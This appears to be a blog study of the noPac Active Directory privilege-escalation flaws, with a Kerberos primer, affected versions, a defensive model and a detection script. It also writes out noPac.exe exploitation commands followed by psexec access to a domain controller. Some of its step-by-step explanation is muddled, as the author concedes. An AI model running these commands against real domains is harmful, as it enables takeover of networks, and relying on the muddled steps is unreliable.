I saw someone publicly disclose an EXP for the CVE-2021-42287/CVE-2021-42278 privilege escalation vulnerabilities, so I looked up the relevant information to study it.
This privilege escalation vulnerability can elevate an ordinary domain user to domain admin privileges. Although certain conditions are required, the harm is still significant.
Since the information about this vulnerability is not yet very systematic and my own understanding is not thorough, the analysis below may not be entirely accurate.
1. Vulnerability Principle
Before understanding the vulnerability principle, it is necessary to understand the principle of the Kerberos protocol.
Put simply, the Kerberos protocol consists of three steps:

Authentication Step | Authentication Process | Authentication Result
---|---|---
AS Authentication | AS-REQ & AS-REP | Obtain TGT
TGS Authentication | TGS-REQ & TGS-REP | Obtain ST
AP Authentication | AP-REQ & AP-REP | Establish the connection between client and server
The authentication process is shown in the following diagram:
CVE-2021-42278:
A machine account's name normally ends with `$`. Because the DC does not verify that a machine account's name actually ends with `$`, a machine account name can be treated as an ordinary user name when operations are performed.

CVE-2021-42287:
Once an ordinary user has obtained a TGT under such a name, they present that TGT to the KDC to request a service ticket for themselves. Because the TGT was issued under a name that no longer matches any user, the KDC cannot find matching user information in its database; it then looks for the machine account (the name with `$` appended) and ends up issuing a ticket that carries that machine account's privileges.
1.1 Vulnerability Process
- Use an ordinary domain user to create a new machine account (by default, domain users are allowed to create machine accounts).
- Clear the machine account's SPN, change the machine account name to the domain controller's name, and remove the trailing `$`.
- Use the newly created machine account to initiate Kerberos authentication and obtain a TGT (Ticket Granting Ticket, a ticket used to request other tickets).
- Delete the machine account and use the obtained TGT to request an ST (Service Ticket) for the LDAP administrator service.
- The domain controller decrypts the TGT, obtains the PAC (Privilege Attribute Certificate), and finds that the requested permissions are for the LDAP administrator service. The domain controller then encrypts the ST with the LDAP server administrator's hash.
- The LDAP server administrator decrypts the PAC using their own hash.
- The requesting user's and the requested user's information are obtained from the PAC to determine whether the user may access the service.
- This determination requires a request to the domain controller. The domain controller first searches its database (Active Directory) for the requester's information. Because the `$` has been removed, the name is searched for as a domain user. When nothing is found, the domain controller searches for machine account information with `$` appended to the name.
- At this point the domain controller concludes that the domain controller machine itself wants to access the LDAP administrator service, and through this request domain controller permissions can be obtained.
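As an added illustration (not code from the original post or from the noPac tool), the following Python model replays the lookup described above: the spoofed name resolves to the domain controller's account once the attacker's account is gone, and a simplified version of the requester-SID check that the patch introduces rejects the same request. The directory contents, account names and SIDs are constructed.

```python
# Added example, not from the original post or the noPac tool: a toy model of the
# KDC lookup that CVE-2021-42278/42287 abuse, beside the requester-SID check the
# patch adds. All names, SIDs and directory contents are constructed.
from dataclasses import dataclass, field

@dataclass
class Account:
    sam: str  # sAMAccountName as stored in the directory
    sid: str  # objectSid; unchanged for the life of the object

@dataclass
class Directory:
    accounts: dict = field(default_factory=dict)  # sAMAccountName -> Account

    def add(self, sam, sid):
        self.accounts[sam] = Account(sam, sid)

    def rename(self, old, new):
        acct = self.accounts.pop(old)
        acct.sam = new
        self.accounts[new] = acct

    def resolve(self, name):
        """Lookup as the post describes it: exact match first, then the
        machine-account form with a trailing '$' appended."""
        return self.accounts.get(name) or self.accounts.get(name + "$")

def tgs_unpatched(d, tgt_cname):
    """Pre-patch behaviour: whatever resolve() returns becomes the requester."""
    acct = d.resolve(tgt_cname)
    return acct.sam if acct else None

def tgs_patched(d, tgt_cname, pac_requestor_sid):
    """Patched behaviour (simplified model of KB5008380): the SID carried in the
    TGT's PAC must belong to the account the name resolves to."""
    acct = d.resolve(tgt_cname)
    return acct.sam if acct and acct.sid == pac_requestor_sid else None

def scenario(patched):
    """Replays the steps in section 1.1 and returns the identity the KDC uses."""
    d = Directory()
    d.add("DC01$", "S-1-5-21-1-1-1-1000")     # constructed: the domain controller
    d.add("test123$", "S-1-5-21-1-1-1-1105")  # constructed: attacker-created account
    d.rename("test123$", "DC01")              # trailing '$' removed, DC's name taken
    tgt_cname, pac_sid = "DC01", "S-1-5-21-1-1-1-1105"  # TGT issued under "DC01"
    del d.accounts["DC01"]                    # account deleted before the TGS request
    if patched:
        return tgs_patched(d, tgt_cname, pac_sid)   # -> None (rejected)
    return tgs_unpatched(d, tgt_cname)              # -> "DC01$"
```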
1.2 Vulnerability Conditions
- Low-privilege domain accounts can create and modify machine accounts.
- When the user is looked up during AP-REP (not TGS-REP) and is not found, the machine account is searched for with `$` appended.
- The domain controller allows delegation attacks.
- The DC is not patched with KB5008380 or KB5008602.
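The conditions above translate into events a defender can watch for. As an added example (not from the original post), this Python snippet flags, in constructed security-event lines, a computer account losing its trailing `$`, a rename to a domain controller's name, and a create/rename/delete burst by one user; the simplified event layout, the user names and the DC list are assumptions.

```python
# Added example, not from the original post: detection logic for the conditions
# above, run over constructed Windows Security event lines rendered in a simplified
# key=value layout (real events are XML). 4741 = computer account created,
# 4781 = account renamed, 4743 = computer account deleted.
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
2021-12-12T10:00:01 EventID=4741 Subject=xfeng Target=test123$
2021-12-12T10:00:03 EventID=4781 Subject=xfeng OldName=test123$ NewName=ad01
2021-12-12T10:00:05 EventID=4781 Subject=xfeng OldName=ad01 NewName=test123$
2021-12-12T10:00:07 EventID=4743 Subject=xfeng Target=test123$
2021-12-12T11:30:00 EventID=4781 Subject=admin OldName=ws07$ NewName=ws08$
"""
DC_NAMES = {"AD01$", "AD02$"}  # DC sAMAccountNames (constructed from ad01/ad02 in the post)

def parse(line):
    ts, rest = line.split(" ", 1)
    ev = dict(kv.split("=", 1) for kv in rest.split())
    ev["ts"] = datetime.fromisoformat(ts)
    return ev

def detect(text, window=timedelta(minutes=10)):
    """Returns (rule, subject, detail) tuples for the sAMAccountName-spoofing pattern."""
    findings, created, burst_seen = [], {}, set()
    for ev in (parse(l) for l in text.splitlines() if l.strip()):
        eid, who = ev["EventID"], ev["Subject"]
        if eid == "4741":
            created[who] = ev["ts"]           # remember who created a machine account
        elif eid == "4781":
            old, new = ev["OldName"], ev["NewName"]
            if old.endswith("$") and not new.endswith("$"):
                findings.append(("trailing_dollar_removed", who, new))
            if new.upper().rstrip("$") + "$" in DC_NAMES:
                findings.append(("renamed_to_dc_name", who, new))
        if eid in ("4781", "4743") and who in created and who not in burst_seen \
                and ev["ts"] - created[who] <= window:
            burst_seen.add(who)               # create -> rename/delete by one user, fast
            findings.append(("create_then_modify_burst", who, eid))
    return findings
```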
2. Affected Versions
CVE-2021-42278
○ Windows Server 2012 R2
○ Windows Server 2012 (Server Core installation)
○ Windows Server 2012
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1
○ Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
○ Windows Server 2008 for x64-based Systems Service Pack 2
○ Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
○ Windows Server 2008 for 32-bit Systems Service Pack 2
○ Windows Server 2016 (Server Core installation)
○ Windows Server 2016
○ Windows Server, version 20H2 (Server Core installation)
○ Windows Server, version 2004 (Server Core installation)
○ Windows Server 2022 (Server Core installation)
○ Windows Server 2019 (Server Core installation)
○ Windows Server 2022
○ Windows Server 2019
○ Windows Server 2012 R2 (Server Core installation)
CVE-2021-42287
○ Windows Server 2012 R2 (Server Core installation)
○ Windows Server 2012 R2
○ Windows Server 2012 (Server Core installation)
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
○ Windows Server 2012
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1
○ Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
○ Windows Server 2008 for x64-based Systems Service Pack 2
○ Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
○ Windows Server 2008 for 32-bit Systems Service Pack 2
○ Windows Server 2016 (Server Core installation)
○ Windows Server 2016
○ Windows Server, version 20H2 (Server Core installation)
○ Windows Server, version 2004 (Server Core installation)
○ Windows Server 2022 (Server Core installation)
○ Windows Server 2022
○ Windows Server 2019 (Server Core installation)
○ Windows Server 2019
3. Vulnerability Reproduction
Tools:
3.1 Scanning and Probing
```cmd
noPac.exe scan -domain redteam.club -user xfeng -pass 123456
```
3.2 Direct Exploitation (noPac.exe)
```cmd
noPac.exe -domain redteam.club -user test -pass pass@123 /dc ad02.redteam.club /mAccount test123 /mPassword feng /service cifs /ptt
dir \\ad01.redteam.club\c$
psexec.exe \\ad01.redteam.club cmd.exe
```
4. Vulnerability Fix
Microsoft has released security patches; the details can be viewed at the link.
Check whether your version of Windows has the corresponding security patch installed.